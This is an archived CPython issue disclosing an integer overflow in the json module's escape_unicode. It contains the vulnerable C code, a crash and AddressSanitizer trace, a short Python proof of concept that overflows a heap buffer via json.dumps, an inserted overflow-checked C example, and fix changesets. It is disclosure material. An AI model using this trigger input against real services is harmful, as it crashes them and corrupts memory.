Integer overflow in _json_encode_unicode leads to crash (heap-buffer-overflow) #68710

Closed
benjaminp opened this issue Jun 27, 2015 · 2 comments
Labels
extension-modules C modules in the Modules dir type-security A security issue

Comments

@benjaminp
Contributor

BPO 24522
Nosy @benjaminp

Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.


GitHub fields:

assignee = None
closed_at = <Date 2015-06-27.20:01:23.920>
created_at = <Date 2015-06-27.20:00:12.180>
labels = ['type-security', 'extension-modules']
title = 'Integer overflow in _json_encode_unicode leads to crash (heap-buffer-overflow)'
updated_at = <Date 2015-06-28.12:43:16.130>
user = 'https://github.com/benjaminp'

bugs.python.org fields:

activity = <Date 2015-06-28.12:43:16.130>
actor = 'Arfrever'
assignee = 'none'
closed = True
closed_date = <Date 2015-06-27.20:01:23.920>
closer = 'python-dev'
components = ['Extension Modules']
creation = <Date 2015-06-27.20:00:12.180>
creator = 'benjamin.peterson'
dependencies = []
files = []
hgrepos = []
issue_num = 24522
keywords = []
message_count = 2.0
messages = ['245891', '245892']
nosy_count = 3.0
nosy_names = ['benjamin.peterson', 'Arfrever', 'python-dev']
pr_nums = []
priority = 'normal'
resolution = 'fixed'
stage = 'resolved'
status = 'closed'
superseder = None
type = 'security'
url = 'https://bugs.python.org/issue24522'
versions = ['Python 3.5', 'Python 3.6']

@benjaminp
Contributor Author

Reported by Brendon Tiszka on the security list:

# static PyObject *
# escape_unicode(PyObject *pystr)
# {
#     /* Take a PyUnicode pystr and return a new escaped PyUnicode */
#     Py_ssize_t i;
#     Py_ssize_t input_chars;
#     Py_ssize_t output_size;
#     Py_ssize_t chars;
#     PyObject *rval;
#     void *input;
#     int kind;
#     Py_UCS4 maxchar;
#
#     if (PyUnicode_READY(pystr) == -1)
#         return NULL;
#
#     maxchar = PyUnicode_MAX_CHAR_VALUE(pystr);
#     input_chars = PyUnicode_GET_LENGTH(pystr);
#     input = PyUnicode_DATA(pystr);
#     kind = PyUnicode_KIND(pystr);
#
#     /* Compute the output size */
#     for (i = 0, output_size = 2; i < input_chars; i++) {
#         Py_UCS4 c = PyUnicode_READ(kind, input, i);
#         switch (c) {
#         case '\\': case '"': case '\b': case '\f':
#         case '\n': case '\r': case '\t':
#             output_size += 2;
#             break;
#         default:
#             if (c <= 0x1f)
#                 output_size += 6;
#             else
#                 output_size++;
#         }
#     }
#
#     rval = PyUnicode_New(output_size, maxchar);

# 1.) if c is <= 0x1f then output_size += 6. There are no overflow checks on this variable.
# 2.) rval buffer is too small to hold results

# Crash:
# ------

# Program received signal SIGSEGV, Segmentation fault.
# 0xb7a2e9be in escape_unicode (pystr=pystr@entry=0x8cf81018)
# at /home/pail/cpython/Modules/_json.c:306
# 306 ENCODE_OUTPUT;

# OS info
# --------
# %./python -V
# > Python 3.6.0a0
# % uname -a
# Linux Pail0verflow 3.13.0-52-generic #85-Ubuntu SMP Wed Apr 29 16:44:56 UTC 2015 i686 i686 i686 GNU/Linux

# ASAN Info (details in other file)
# =================================================================
# ==6512== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5c00000 at pc 0xb5f17356 bp 0xbfaa0eb8 sp 0xbfaa0eac
# WRITE of size 1 at 0xb5c00000 thread T0

import json

sp = "\x13"*715827883 #((2**32)/6 + 1)
json.dumps([sp], ensure_ascii=False)
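
The overflow-checked size computation the report is asking for, as an added example that is neither the reporter's code nor the actual CPython fix: `escape_growth`, `escaped_size` and `escape_json` are hypothetical names, `limit` stands in for PY_SSIZE_T_MAX so the refusal path can be exercised on a 20-byte input instead of the 715 million characters in the PoC, and the input is assumed to be Latin-1 text on the ensure_ascii=False path (which is why \u00XX only appears for control characters).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Growth per input character, mirroring escape_unicode(): 2 for the short
 * escapes, 6 for \u00XX control characters, 1 otherwise (Latin-1 input assumed). */
static ptrdiff_t escape_growth(unsigned char c)
{
    switch (c) {
    case '\\': case '"': case '\b': case '\f':
    case '\n': case '\r': case '\t': return 2;
    default: return c <= 0x1f ? 6 : 1;
    }
}

/* Overflow-checked size (escaped length incl. both quotes), or -1 if a step
 * would exceed `limit`; `limit` stands in for PY_SSIZE_T_MAX (hypothetical). */
ptrdiff_t escaped_size(const unsigned char *s, size_t n, ptrdiff_t limit)
{
    ptrdiff_t output_size = 2;
    for (size_t i = 0; i < n; i++) {
        ptrdiff_t d = escape_growth(s[i]);
        if (output_size > limit - d)   /* output_size + d would wrap */
            return -1;
        output_size += d;
    }
    return output_size;
}

/* Escape `s` into `out` (capacity `cap`); returns bytes written, or -1 when
 * the size is unrepresentable or `cap` is below the computed budget. */
ptrdiff_t escape_json(const unsigned char *s, size_t n, char *out, size_t cap)
{
    ptrdiff_t need = escaped_size(s, n, PTRDIFF_MAX);
    if (need < 0 || (size_t)need > cap) return -1;
    char *p = out; *p++ = '"';
    for (size_t i = 0; i < n; i++) {
        unsigned char c = s[i];
        const char *e = c == '\\' ? "\\\\" : c == '"' ? "\\\"" : c == '\b' ? "\\b"
                      : c == '\f' ? "\\f" : c == '\n' ? "\\n" : c == '\r' ? "\\r"
                      : c == '\t' ? "\\t" : NULL;
        if (e) { memcpy(p, e, 2); p += 2; }
        else if (c <= 0x1f) {              /* the six-byte \u00XX form */
            memcpy(p, "\\u00", 4); p += 4;
            *p++ = "0123456789abcdef"[c >> 4]; *p++ = "0123456789abcdef"[c & 0xf];
        }
        else *p++ = (char)c;
    }
    *p++ = '"'; return p - out;
}
```

The writer emits exactly the bytes the size pass budgeted per character, which is the invariant the unchecked `output_size += 6` broke once the sum wrapped.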

@benjaminp benjaminp added extension-modules C modules in the Modules dir type-security A security issue labels Jun 27, 2015
@python-dev
Mannequin

python-dev mannequin commented Jun 27, 2015

New changeset 0540e14c4b64 by Benjamin Peterson in branch '3.5':
prevent integer overflow in escape_unicode (closes bpo-24522)
https://hg.python.org/cpython/rev/0540e14c4b64

New changeset fc799b2edf21 by Benjamin Peterson in branch 'default':
merge 3.5 (bpo-24522)
https://hg.python.org/cpython/rev/fc799b2edf21

@python-dev python-dev mannequin closed this as completed Jun 27, 2015
@ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022